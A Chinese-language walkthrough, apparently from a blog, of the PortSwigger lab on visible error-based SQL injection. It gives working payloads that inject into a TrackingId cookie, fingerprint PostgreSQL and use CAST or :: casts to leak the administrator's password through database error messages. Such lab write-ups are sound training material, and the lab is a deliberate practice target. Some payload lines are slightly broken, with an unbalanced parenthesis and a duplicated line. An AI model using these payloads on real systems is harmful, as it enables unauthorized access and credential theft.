Portswigger靶场之Visible error-based SQL injection通关秘籍

一、分析题目

提示告诉我们:该靶场存在一个 SQL 注入漏洞。该应用程序使用跟踪 cookie 进行分析,并执行包含所提交 cookie 值的 SQL 查询,但 SQL 查询的结果并未被返回。该数据库中有一个名为"用户"的不同表格,其中包含"用户名"和"密码"两列。要完成这个实验,需要找到一种方法泄露管理员用户的密码,然后登录他们的账户。

二、判断类型

1、判断注入类型

首先,我们尝试输入一个单引号时报错,输入两个单引号时页面显示正常,可以判断为布尔注入

2、判断数据库类型

接下来我们通过下面语句

sql 复制代码
'||(select version())||'

可以排除他不是Oracle(它不认识 version() 函数)和Microsoft SQL Server(它不认识 ||)数据库

接下来通过以下语句报错,可以说明他是PostgreSQL数据库

sql 复制代码
'||(select @@version)||'

三、进行注入

首先,通过以下代码说明确实有username这一列

sql 复制代码
TrackingId=Uadq1mfzxchQIzk5'||(select username from users limit 1)||'
sql 复制代码
'||(select password from users where username ='administrator' limit 1)||'

上面输入查询密码的语句出现以下报错:

Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = 'Uadq1mfzxchQIzk5'||(select password from users where usernam'. Expected char

是因为我们的注入语句因为超出了应用程序允许的最大字符长度限制,没有被完整地传递给后端数据库。

既然问题是总长度超限,那么缩短注入语句的长度就是一个直接有效的解决方案。Uadq1mfzxchQIzk5这部分字符串是原始查询的一部分,通常是一个会话ID或跟踪Cookie的值。在注入时,这部分内容对于我们来说是没有意义的"噪音",只是为了满足原始查询的格式。我们可以通过将其删除或替换为更短的字符,为真正想执行的恶意查询(即 ||(select ...) 部分)腾出更多的空间,使其能够被完整地发送到数据库执行。

删掉ID是为了解决长度限制 的问题,但是仍然报错,是因为数据类型不匹配 。此时我们引入 CAST 函数,CAST 函数是SQl通用的一个函数,用于将一个值从一种数据类型转换为另一种数据类型。这个函数可以用于转换数值、日期、时间以及字符串数据类型。

sql 复制代码
'and 1=cast((select 1)as int)--+

当然,我们也可以使用 PostgreSQL 特有的 :: 快捷语法达成相同效果

sql 复制代码
=' and 1=(select 1)::integer --

1、通用方法(cast):

接下来我们开始找帐号和密码,我们通过一下语句不是为了让查询正常返回,而是为了故意引发一个数据库错误,进而 观察Web应用是否返回了数据库的详细错误信息,来判断 users 表和 username 列、password列是否存在。

sql 复制代码
'and 1=cast((select username from users limit 1)as int)--+
sql 复制代码
'and 1=cast((select password from users limit 1)as int)--+

2、PostgreSQL特有方法(::):

我们也可以通过下列语句达到相同效果

sql 复制代码
'and 1=(select username from users limit 1)::int)--+
'and 1=(select username from users limit 1)::int)--+

四、成功通关

拿到帐号密码后,登陆即通关

学习参考:归去来兮-zangcc 【送书活动第2期】打靶Portswigger系列------ 一口气通关18个SQL注入靶场详细流程(文末送书)

相关推荐
摩羯座-185690305944 小时前
爬坑 10 年!京东店铺全量商品接口实战开发:从分页优化、SKU 关联到数据完整性闭环
linux·网络·数据库·windows·爬虫·python
编程充电站pro5 小时前
SQL 面试高频:INNER JOIN vs LEFT JOIN 怎么考?
数据库·sql
这周也會开心5 小时前
SQL-窗口函数做题总结
数据库·sql
间彧5 小时前
TiDB详解与Spring Boot实战指南
数据库
极限实验室5 小时前
Easysearch 字段'隐身'之谜:source_reuse 与 ignore_above 的陷阱解析
数据库·redis
2301_772093565 小时前
tuchuang_后端_前端_注册登录
数据库·后端·网络协议·mysql·wireshark
武子康5 小时前
Java-141 深入浅出 MySQL Spring事务失效的常见场景与解决方案详解(3)
java·数据库·mysql·spring·性能优化·系统架构·事务
间彧5 小时前
脏读、不可重复读、幻读详解与对比
数据库
间彧5 小时前
数据库事务隔离级别详解
数据库
fwerfv3453456 小时前
使用PyTorch构建你的第一个神经网络
jvm·数据库·python